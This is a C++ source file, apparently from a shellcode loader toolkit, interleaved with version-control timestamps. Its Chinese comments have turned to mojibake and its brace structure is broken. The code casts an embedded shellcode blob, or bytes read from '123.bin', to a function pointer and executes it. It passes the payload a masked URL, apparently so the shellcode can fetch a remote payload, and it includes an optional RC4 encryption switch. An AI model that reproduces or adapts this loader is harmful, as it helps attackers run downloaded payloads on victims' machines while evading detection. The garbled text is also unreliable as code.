2021-02-22 06:23:52 -08:00
|
|
|
|
// RcDllShelcode.cpp : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̨Ӧ<CCA8>ó<EFBFBD><C3B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ㡣
|
|
|
|
|
//
|
|
|
|
|
|
|
|
|
|
#include "stdafx.h"
|
|
|
|
|
#include<Windows.h>
|
|
|
|
|
#include"ShellCode.h"
|
|
|
|
|
#pragma warning(disable:4996)
|
|
|
|
|
//#pragma comment(linker, "/section:.data,RWE")
|
|
|
|
|
|
|
|
|
|
DWORD ReadFileData(char *szFilePath, char *pBuf)
|
|
|
|
|
{
|
|
|
|
|
DWORD dwBytesRead;
|
|
|
|
|
HANDLE hFile;
|
|
|
|
|
|
|
|
|
|
hFile = CreateFile(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
|
|
|
|
|
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
|
|
|
|
|
|
|
|
|
if (hFile == INVALID_HANDLE_VALUE)
|
|
|
|
|
{
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
DWORD dwFileSize = GetFileSize(hFile, 0);
|
|
|
|
|
if (dwFileSize == 0)
|
|
|
|
|
{
|
|
|
|
|
CloseHandle(hFile);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
ReadFile(hFile, pBuf, dwFileSize, &dwBytesRead, NULL);
|
|
|
|
|
CloseHandle(hFile);
|
|
|
|
|
return dwFileSize;
|
|
|
|
|
}
|
|
|
|
|
DWORD GetFileSizeLen(char *szSource)
|
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
HANDLE hFile;
|
|
|
|
|
|
|
|
|
|
hFile = CreateFile(szSource, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
|
|
|
|
|
|
|
|
|
if (hFile == INVALID_HANDLE_VALUE)
|
|
|
|
|
{
|
|
|
|
|
MessageBoxA(NULL, "<EFBFBD>ļ<EFBFBD>δ<EFBFBD>ҵ<EFBFBD><EFBFBD><EFBFBD>", NULL, NULL);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
DWORD dwFileSize = GetFileSize(hFile, 0);
|
|
|
|
|
if (dwFileSize == 0)
|
|
|
|
|
{
|
|
|
|
|
MessageBoxA(NULL, "<EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD>㣡", NULL, NULL);
|
|
|
|
|
CloseHandle(hFile);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
CloseHandle(hFile);
|
|
|
|
|
return dwFileSize;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#ifndef RUNEXEMT
|
|
|
|
|
void RunShellCode()
|
|
|
|
|
{
|
|
|
|
|
int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart;
|
|
|
|
|
|
|
|
|
|
void* shellcodeEnter = mmLoaderSCStart;
|
|
|
|
|
typedef void(WINAPI* fnFun)(
|
|
|
|
|
char*
|
|
|
|
|
);
|
|
|
|
|
char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
|
|
|
|
|
fnFun Shellcode = (fnFun)(shellcodeEnter);
|
|
|
|
|
Shellcode(URL);
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
#else
|
|
|
|
|
|
|
|
|
|
void RunShellCode()
|
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
char shelname[] = "123.bin";
|
|
|
|
|
|
|
|
|
|
DWORD filelen = GetFileSizeLen(shelname);
|
|
|
|
|
char *filebuf = new char[filelen];
|
|
|
|
|
ReadFileData(shelname, filebuf);
|
|
|
|
|
|
|
|
|
|
char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
|
|
|
|
|
|
|
|
|
|
typedef void(WINAPI* fnFun)(
|
|
|
|
|
char*
|
|
|
|
|
);
|
|
|
|
|
|
|
|
|
|
fnFun Shellcode = (fnFun)(filebuf);
|
|
|
|
|
Shellcode(URL);
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
#endif
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shelocde<EFBFBD><EFBFBD>д,<EFBFBD><EFBFBD>ȡ,<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
Debugģʽ<EFBFBD>£<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD>д<EFBFBD><EFBFBD>shelcode<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
ReleaseģʽΪ<EFBFBD><EFBFBD>ȡshelcode<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ķ<EFBFBD><EFBFBD>ǿ<EFBFBD><EFBFBD><EFBFBD>ֱ<EFBFBD><EFBFBD>call<EFBFBD>Ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
RUN_EXE_MT <EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD>exe
|
|
|
|
|
*/
|
|
|
|
|
#ifdef RUNEXEMT
|
|
|
|
|
/*
|
|
|
|
|
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
|
|
|
|
|
_In_opt_ HINSTANCE hPrevInstance,
|
|
|
|
|
_In_ LPTSTR lpCmdLine,
|
|
|
|
|
_In_ int nCmdShow)
|
|
|
|
|
{
|
|
|
|
|
*/
|
|
|
|
|
int _tmain(int argc, _TCHAR* argv[])
|
|
|
|
|
{
|
2021-04-08 08:10:17 -07:00
|
|
|
|
RunShellCode();
|
|
|
|
|
return 0;
|
2021-02-22 06:23:52 -08:00
|
|
|
|
#else
|
|
|
|
|
|
|
|
|
|
int _tmain(int argc, _TCHAR* argv[])
|
|
|
|
|
{
|
2021-04-08 02:02:30 -07:00
|
|
|
|
|
2021-02-22 06:23:52 -08:00
|
|
|
|
#endif
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#ifdef _DEBUG
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
RunShellCode();
|
|
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
|
#else
|
|
|
|
|
//<2F><><EFBFBD>üӽ<C3BC><D3BD>ܵĿ<DCB5><C4BF><EFBFBD>
|
|
|
|
|
// #define RC4_EN
|
|
|
|
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD>
|
|
|
|
|
int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart;
|
|
|
|
|
|
|
|
|
|
void * shellcodeEnter =mmLoaderSCStart;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD>shellcode<64>ļ<EFBFBD>
|
|
|
|
|
FILE *fp;
|
|
|
|
|
fp = fopen("123.bin", "w+b");
|
|
|
|
|
if (fp)
|
|
|
|
|
{
|
|
|
|
|
#ifdef RC4_EN
|
|
|
|
|
fwrite(shellcodeEnter, (dwShellCodeLen + sizeof(s_flag)*2), 1, fp);
|
|
|
|
|
#else
|
|
|
|
|
fwrite(shellcodeEnter, dwShellCodeLen, 1, fp);
|
|
|
|
|
#endif
|
|
|
|
|
fclose(fp);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
|
#endif
|
|
|
|
|
}
|
|
|
|
|
|